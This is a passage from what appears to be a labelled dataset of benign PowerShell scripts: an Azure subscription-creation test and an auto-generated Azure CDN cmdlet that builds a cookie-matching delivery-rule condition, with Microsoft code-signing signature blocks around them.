Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo2RjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUATkEpJXOaqI2wfqBsw4NLVwqYqqqggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJZP4wIhgPMjAyNDEwMjgwMTE4NTRaGA8yMDI0MTAyOTAxMTg1NFowdzA9 # BgorBgEEAYRZCgQBMS8wLTAKAgUA6slk/gIBADAKAgEAAgIj+QIB/zAHAgEAAgIV # OjAKAgUA6sq2fgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow # CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAqtLGFlstr # sb+SvUvbr1hLCetkINEwDxfniiboUQVt4GeQLoY14M6leM9y61oAgIF33fHJalc0 # m6hRYHUUukHmnf8OOSaTiiX/nslEh3oTsZMRPqzR1k5LfvMp3a2pIDntcYlMbl2o # yGD7wib38kMuMk5xFDVhvCk9VkAOFUb8IsBonqOwm32MCwxu4PiML3KP595ks9mt # 6PxX1auBQ1gIcLfYEno+8vVKQpYBwZyizAA8LlxCwE+atWpPKH7AHBCaUnoWAwdk # m5NtHKLBGrmDUjlyWtaRXvWXYJdFC3R4GSvWAAdmbfao2+coyd9IdOXkz3f7u7vY # B3P4HYG5NEz1MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAH8GKCvzGlahzoAAQAAAfwwDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgImLkU13I # bU6dKxSeVJO4NxrO+TAWzHHiGLuCPXG3eWkwgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCCVQq+Qu+/h/BOVP4wweUwbHuCUhh+T7hq3d5MCaNEtYjCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB/Bigr8xpWoc6AAEA # AAH8MCIEINOFZp4mWvilNmu2oP8JaiDsbYhML+c3SwBUR/vJ4UAWMA0GCSqGSIb3 # DQEBCwUABIICABiZw9yH8ui2P3IQSkI5jPCWuvDsfKtSeR80dI6BcTiWhHeoo2Mn # lpolSOkNmn9M34yq5ULFeQ9ZaSfhX/OvUTfJ4NHaBciqNQp+vd7XR7qIDQJqPn60 # UboqQtqAjUb1js8zXJZEwfCq9wQ8CHHvpWxfmUF5KAXO3PRn2hZuNnySbYYQVLfK # pb+qP2Q6ggF6ZJSyOCoA0tm1mIjfYZFoZm+NEwfHmXA5hPbdbj8+l3VyzOes+ttb # UpYZgror7HTDEKvesWz+hVFAl+Gj8E+BFVJjJ6BClQBK7C+m5QhwN+lWmFPzipu4 # UmL1uVRSU3oDDVGjjAe9ZWjCpkJPbmkb6A8qt5sVUfoXi4srtrPVcvcTgN/3KtJh # Z6gpPgvvnAYUj1V735cmuSXYhSWkoiFyTcvsEW+oDT2et4h9yWJlPLUTTzDnvETD # 9uqH7cbFQ1n5qW8JiozGDfOamJaGkSJYsLC8ZIgrCdJT8groT4rcv6N/h89ZEz0L # QKB8/cAnOrm7xbfbeD4TyT5L6LjQSyhoH8Wn78+QrAfwiGJDbELu1xkNwIAlAL1I # JzKMPdlKvZuVRdDpKhMDt+oCbc7kV02fb+vFX9n8dr8jVwFQSZbS9VdRpxMQtQqF # UNppvuroBMOn0OEnqAGeWqNWW51LdlaxKkVcfKU8Vdyc24H5kESaExIU # SIG # End signature block
combined_dataset/train/non-malicious/3567.ps1
3567.ps1
function Test-NewSubscription { $accounts = @(@{ ObjectId = "cdf813b6-bdc2-4df5-b150-00ccfd7580e2" }) Assert-True { $accounts.Count -gt 0 } $myNewSubName = GetAssetName $newSub = New-AzSubscription -EnrollmentAccountObjectId $accounts[0].ObjectId -Name $myNewSubName -OfferType MS-AZR-0017P Assert-AreEqual $myNewSubName $newSub.Name Assert-NotNull $newSub.SubscriptionId }
combined_dataset/train/non-malicious/sample_62_33.ps1
sample_62_33.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Create an in-memory object for DeliveryRuleCookiesCondition. .Description Create an in-memory object for DeliveryRuleCookiesCondition. .Outputs Microsoft.Azure.PowerShell.Cmdlets.Cdn.Models.Api20240201.DeliveryRuleCookiesCondition .Link https://learn.microsoft.com/powershell/module/Az.Cdn/new-AzCdnDeliveryRuleCookiesConditionObject #> function New-AzCdnDeliveryRuleCookiesConditionObject { [OutputType('Microsoft.Azure.PowerShell.Cmdlets.Cdn.Models.Api20240201.DeliveryRuleCookiesCondition')] [CmdletBinding(PositionalBinding=$false)] Param( [Parameter(HelpMessage="The match value for the condition of the delivery rule.")] [string[]] $ParameterMatchValue, [Parameter(HelpMessage="Describes if this is negate condition or not.")] [bool] $ParameterNegateCondition, [Parameter(Mandatory, HelpMessage="Describes operator to be matched.")] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Cdn.Support.CookiesOperator])] [Microsoft.Azure.PowerShell.Cmdlets.Cdn.Support.CookiesOperator] $ParameterOperator, [Parameter(HelpMessage="Name of Cookies to be matched.")] [string] $ParameterSelector, [Parameter(HelpMessage="List of transforms.")] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Cdn.Support.Transform])] [Microsoft.Azure.PowerShell.Cmdlets.Cdn.Support.Transform[]] $ParameterTransform, [Parameter(Mandatory, HelpMessage="The name of the condition for the delivery rule.")] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Cdn.Support.MatchVariable])] [Microsoft.Azure.PowerShell.Cmdlets.Cdn.Support.MatchVariable] $Name ) process { $Object = [Microsoft.Azure.PowerShell.Cmdlets.Cdn.Models.Api20240201.DeliveryRuleCookiesCondition]::New() if ($PSBoundParameters.ContainsKey('ParameterMatchValue')) { $Object.ParameterMatchValue = $ParameterMatchValue } if ($PSBoundParameters.ContainsKey('ParameterNegateCondition')) { $Object.ParameterNegateCondition = $ParameterNegateCondition } if ($PSBoundParameters.ContainsKey('ParameterOperator')) { $Object.ParameterOperator = $ParameterOperator } if ($PSBoundParameters.ContainsKey('ParameterSelector')) { $Object.ParameterSelector = $ParameterSelector } if ($PSBoundParameters.ContainsKey('ParameterTransform')) { $Object.ParameterTransform = $ParameterTransform } if ($PSBoundParameters.ContainsKey('Name')) { $Object.Name = $Name } return $Object } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCfqboF5aEd2169 # TPXjROvViEkraoT4KDEcifIOVtsGlaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFwacpSZIMgMrpisQCYYeCy/ # /BWxI8ZsWl7pcDsoMIrkMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAsQXmF3yulTt4JYgjqpNipAZByLlDKVgnIdKCI8ha9k1k8kXUDFmvpNuz # rjzOBZ+cTubH3hcsqhAOTq9fM/oW0Rkc4px8wSeKXi6XWKJO55h4a261uzaH+HwW # 4UwpYQkaNfNTAwVFPUG3YCekxeOVNeZohjk1tnipZXHO0MmTvN0cD0AogXhOpbax # 4cwlu0Bnkp4arK+IojVgv4VXenASvHqiNm/t7gMH2vjyaYHxXHu0ccqK6LqkAjko # Ei7LHmULVmZRNqfpNVVfvsgcQ3fpY+WL5Ul3AElrtI+x20tGNt/GllM2aGAUAV5Q # 0zr032na+ORnitONwRwGp2c0UIlZPqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAAmPJXYQkRl+o2UiNVmZ5IrYguOhDsSO+GfxPYLad5owIGZpetymdd # GBMyMDI0MDczMTA3MDA1NS42NzhaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjJBRDQtNEI5Mi1GQTAxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHenkielp8oRD0AAQAAAd4wDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzEyWhcNMjUwMTEwMTkwNzEyWjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0LTRC # OTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALSB9ByF9UIDhA6xFrOniw/x # sDl8sSi9rOCOXSSO4VMQjnNGAo5VHx0iijMEMH9LY2SUIBkVQS0Ml6kR+TagkUPb # aEpwjhQ1mprhRgJT/jlSnic42VDAo0en4JI6xnXoAoWoKySY8/ROIKdpphgI7OJb # 4XHk1P3sX2pNZ32LDY1ktchK1/hWyPlblaXAHRu0E3ynvwrS8/bcorANO6Djuysy # S9zUmr+w3H3AEvSgs2ReuLj2pkBcfW1UPCFudLd7IPZ2RC4odQcEPnY12jypYPnS # 6yZAs0pLpq0KRFUyB1x6x6OU73sudiHON16mE0l6LLT9OmGo0S94Bxg3N/3aE6fU # bnVoemVc7FkFLum8KkZcbQ7cOHSAWGJxdCvo5OtUtRdSqf85FklCXIIkg4sm7nM9 # TktUVfO0kp6kx7mysgD0Qrxx6/5oaqnwOTWLNzK+BCi1G7nUD1pteuXvQp8fE1Kp # TjnG/1OJeehwKNNPjGt98V0BmogZTe3SxBkOeOQyLA++5Hyg/L68pe+DrZoZPXJa # GU/iBiFmL+ul/Oi3d83zLAHlHQmH/VGNBfRwP+ixvqhyk/EebwuXVJY+rTyfbRfu # h9n0AaMhhNxxg6tGKyZS4EAEiDxrF9mAZEy8e8rf6dlKIX5d3aQLo9fDda1ZTOw+ # XAcAvj2/N3DLVGZlHnHlAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUazAmbxseaapg # dxzK8Os+naPQEsgwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAOKUwHsXDacGOvUI # gs5HDgPs0LZ1qyHS6C6wfKlLaD36tZfbWt1x+GMiazSuy+GsxiVHzkhMW+FqK8gr # uLQWN/sOCX+fGUgT9LT21cRIpcZj4/ZFIvwtkBcsCz1XEUsXYOSJUPitY7E8bbld # mmhYZ29p+XQpIcsG/q+YjkqBW9mw0ru1MfxMTQs9MTDiD28gAVGrPA3NykiSChvd # qS7VX+/LcEz9Ubzto/w28WA8HOCHqBTbDRHmiP7MIj+SQmI9VIayYsIGRjvelmNa # 0OvbU9CJSz/NfMEgf2NHMZUYW8KqWEjIjPfHIKxWlNMYhuWfWRSHZCKyIANA0aJL # 4soHQtzzZ2MnNfjYY851wHYjGgwUj/hlLRgQO5S30Zx78GqBKfylp25aOWJ/qPhC # +DXM2gXajIXbl+jpGcVANwtFFujCJRdZbeH1R+Q41FjgBg4m3OTFDGot5DSuVkQg # jku7pOVPtldE46QlDg/2WhPpTQxXH64sP1GfkAwUtt6rrZM/PCwRG6girYmnTRLL # sicBhoYLh+EEFjVviXAGTk6pnu8jx/4WPWu0jsz7yFzg82/FMqCk9wK3LvyLAyDH # N+FxbHAxtgwad7oLQPM0WGERdB1umPCIiYsSf/j79EqHdoNwQYROVm+ZX10RX3n6 # 